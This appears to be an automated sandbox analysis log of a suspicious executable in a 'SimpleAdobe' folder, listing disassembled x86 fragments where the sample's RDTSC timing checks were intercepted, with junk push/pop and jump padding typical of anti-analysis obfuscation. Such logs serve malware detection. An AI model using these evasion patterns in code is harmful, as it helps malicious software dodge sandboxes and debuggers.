Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BF1196 second address: BF11A8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F7F0D21AE08h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BF11A8 second address: A2EBBB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7F0D2259B8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D2A47h], esi 0x00000013 cld 0x00000014 push dword ptr [ebp+122D1461h] 0x0000001a mov edi, dword ptr [ebp+122D3866h] 0x00000020 call dword ptr [ebp+122D17ECh] 0x00000026 pushad 0x00000027 jng 00007F7F0D2259D2h 0x0000002d js 00007F7F0D2259CCh 0x00000033 jmp 00007F7F0D2259C6h 0x00000038 xor eax, eax 0x0000003a sub dword ptr [ebp+122D3095h], ecx 0x00000040 mov edx, dword ptr [esp+28h] 0x00000044 jmp 00007F7F0D2259C2h 0x00000049 mov dword ptr [ebp+122D3A16h], eax 0x0000004f pushad 0x00000050 mov eax, dword ptr [ebp+122D379Ah] 0x00000056 and esi, 31E37ACEh 0x0000005c popad 0x0000005d mov esi, 0000003Ch 0x00000062 mov dword ptr [ebp+122D3095h], eax 0x00000068 add esi, dword ptr [esp+24h] 0x0000006c mov dword ptr [ebp+122D1B42h], edi 0x00000072 lodsw 0x00000074 jmp 00007F7F0D2259BEh 0x00000079 add eax, dword ptr [esp+24h] 0x0000007d clc 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 mov dword ptr [ebp+122D1A7Ch], esi 0x00000088 sub dword ptr [ebp+122D1B7Fh], ecx 0x0000008e nop 0x0000008f pushad 0x00000090 jmp 00007F7F0D2259C1h 0x00000095 push esi 0x00000096 jmp 00007F7F0D2259C8h 0x0000009b pop esi 0x0000009c popad 0x0000009d push eax 0x0000009e push ebx 0x0000009f push eax 0x000000a0 push edx 0x000000a1 jmp 00007F7F0D2259BBh 0x000000a6 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BF123A second address: BF123E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BF1371 second address: BF13B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a popad 0x0000000b xchg eax, esi 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F7F0D2259B8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 jp 00007F7F0D2259BAh 0x0000002c mov di, D3D0h 0x00000030 mov dword ptr [ebp+122D272Ah], edx 0x00000036 push eax 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push esi 0x0000003b pop esi 0x0000003c rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BF14D7 second address: BF150B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7F0D21AE0Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F7F0D21AE0Fh 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F7F0D21AE0Dh 0x0000001c rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BF150B second address: BF1511 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BF1511 second address: BF1515 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BF1593 second address: BF1598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BF1AA5 second address: BF1ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7F0D21AE0Ch 0x00000010 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BF1ABC second address: BF1AD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D2259C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BFD49D second address: BFD4A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BFE4F3 second address: BFE5D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F7F0D2259C6h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c add di, FFEAh 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov dword ptr [ebp+122D1873h], edi 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push edx 0x00000028 call 00007F7F0D2259B8h 0x0000002d pop edx 0x0000002e mov dword ptr [esp+04h], edx 0x00000032 add dword ptr [esp+04h], 00000019h 0x0000003a inc edx 0x0000003b push edx 0x0000003c ret 0x0000003d pop edx 0x0000003e ret 0x0000003f mov edi, dword ptr [ebp+122D39F6h] 0x00000045 mov dword ptr [ebp+122D2B4Ch], edx 0x0000004b mov eax, dword ptr [ebp+122D1769h] 0x00000051 push 00000000h 0x00000053 push ecx 0x00000054 call 00007F7F0D2259B8h 0x00000059 pop ecx 0x0000005a mov dword ptr [esp+04h], ecx 0x0000005e add dword ptr [esp+04h], 00000014h 0x00000066 inc ecx 0x00000067 push ecx 0x00000068 ret 0x00000069 pop ecx 0x0000006a ret 0x0000006b mov ebx, dword ptr [ebp+122D2A6Eh] 0x00000071 jmp 00007F7F0D2259C3h 0x00000076 push FFFFFFFFh 0x00000078 mov edi, dword ptr [ebp+122D1B58h] 0x0000007e adc bx, AB52h 0x00000083 nop 0x00000084 jo 00007F7F0D2259C8h 0x0000008a push eax 0x0000008b push eax 0x0000008c push edx 0x0000008d push eax 0x0000008e push edx 0x0000008f jmp 00007F7F0D2259C4h 0x00000094 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BFE5D0 second address: BFE5E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D21AE12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C00529 second address: C00542 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7F0D2259BEh 0x00000010 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C01463 second address: C01467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C0150E second address: C01512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C0256F second address: C02573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C0561F second address: C05623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C0572E second address: C05734 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BF1E17 second address: BF1E27 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BF1E27 second address: BF1E2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BF1E2C second address: BCF474 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 call 00007F7F0D2259BEh 0x0000000e mov edi, esi 0x00000010 pop edx 0x00000011 call dword ptr [ebp+122D2E42h] 0x00000017 pushad 0x00000018 push edi 0x00000019 pushad 0x0000001a popad 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d pop edi 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BCF474 second address: BCF490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F0D21AE18h 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BCF490 second address: BCF494 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BCF494 second address: BCF4B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F0D21AE14h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C21809 second address: C21823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F0D2259C6h 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C21823 second address: C21835 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7F0D21AE06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F7F0D21AE0Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C21982 second address: C21986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C21986 second address: C21998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F7F0D21AE06h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C21998 second address: C2199C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C2199C second address: C219A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C22040 second address: C2204B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7F0D2259B6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C2204B second address: C2208A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F7F0D21AE14h 0x0000000a jmp 00007F7F0D21AE19h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F7F0D21AE08h 0x0000001a push edx 0x0000001b pop edx 0x0000001c rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C2B7CF second address: C2B7D5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C2A26E second address: C2A273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C2A273 second address: C2A279 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C2A3D0 second address: C2A3D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C2A3D4 second address: C2A3EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7F0D2259BAh 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C2A3EE second address: C2A414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F7F0D21AE21h 0x0000000b rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C2A6D4 second address: C2A6E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 push eax 0x00000008 jnl 00007F7F0D2259B8h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C2A6E8 second address: C2A6EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C2AABA second address: C2AABE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C2AABE second address: C2AADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F0D21AE0Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F7F0D21AE0Bh 0x00000014 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C2AADF second address: C2AAF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D2259BAh 0x00000007 jns 00007F7F0D2259B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C2AC17 second address: C2AC23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7F0D21AE06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C2AC23 second address: C2AC44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7F0D2259C8h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C2AEF9 second address: C2AF10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007F7F0D21AE0Ch 0x00000010 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C2AF10 second address: C2AF1C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7F0D2259B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C2AF1C second address: C2AF23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C2B0AF second address: C2B0BC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jc 00007F7F0D2259B6h 0x00000009 pop ecx 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C2B65A second address: C2B677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7F0D21AE12h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C2B677 second address: C2B67B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C2B67B second address: C2B685 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7F0D21AE06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C29F80 second address: C29FC4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7F0D2259B6h 0x00000008 jmp 00007F7F0D2259BFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jns 00007F7F0D2259C4h 0x00000015 jnc 00007F7F0D2259BEh 0x0000001b push esi 0x0000001c jnl 00007F7F0D2259B6h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C32715 second address: C3271F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7F0D21AE0Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C3271F second address: C32733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F7F0D2259C2h 0x0000000c js 00007F7F0D2259B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C31415 second address: C3142B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7F0D21AE06h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jo 00007F7F0D21AE06h 0x00000016 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C3142B second address: C3145B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D2259C1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F7F0D2259BEh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 jnp 00007F7F0D2259B6h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jl 00007F7F0D2259B6h 0x00000024 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C3145B second address: C31471 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D21AE12h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C31471 second address: C3147B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C3147B second address: C31481 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C31725 second address: C31739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 jne 00007F7F0D2259B6h 0x0000000d jnp 00007F7F0D2259B6h 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C31739 second address: C31741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C31741 second address: C31745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C31745 second address: C3174B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C31A1B second address: C31A48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D2259C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a jne 00007F7F0D2259CEh 0x00000010 jmp 00007F7F0D2259BCh 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push edi 0x0000001a pop edi 0x0000001b rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C31FEE second address: C31FF3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C32430 second address: C3243F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jp 00007F7F0D2259B6h 0x0000000f rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C3243F second address: C32443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C32443 second address: C32483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7F0D2259C0h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7F0D2259BFh 0x00000013 jmp 00007F7F0D2259C8h 0x00000018 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C35458 second address: C3545E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C3545E second address: C35465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
